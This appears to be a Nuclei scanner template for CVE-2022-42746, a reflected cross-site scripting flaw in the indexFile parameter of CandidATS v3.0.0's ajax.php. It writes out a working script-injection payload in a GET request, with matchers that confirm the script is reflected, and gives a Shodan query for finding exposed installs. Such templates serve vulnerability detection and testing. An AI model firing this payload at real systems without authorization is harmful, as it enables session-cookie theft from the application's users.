id: CVE-2022-42746

info:
  name: CandidATS v3.0.0 - Cross Site Scripting.
  author: arafatansari
  severity: Medium
  description: CandidATS v3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users.
  reference:
    - https://fluidattacks.com/advisories/modestep/
  metadata:
    shodan-query: http.html:"CandidATS"
    verified: true
  tags: xss,cve,2022

requests:
  - method: GET
    path:    
      - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&isPopup=0'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
            - '<script>alert(document.cookie)</script>'
      
        condition: and
      - type: status
        status:
          - 404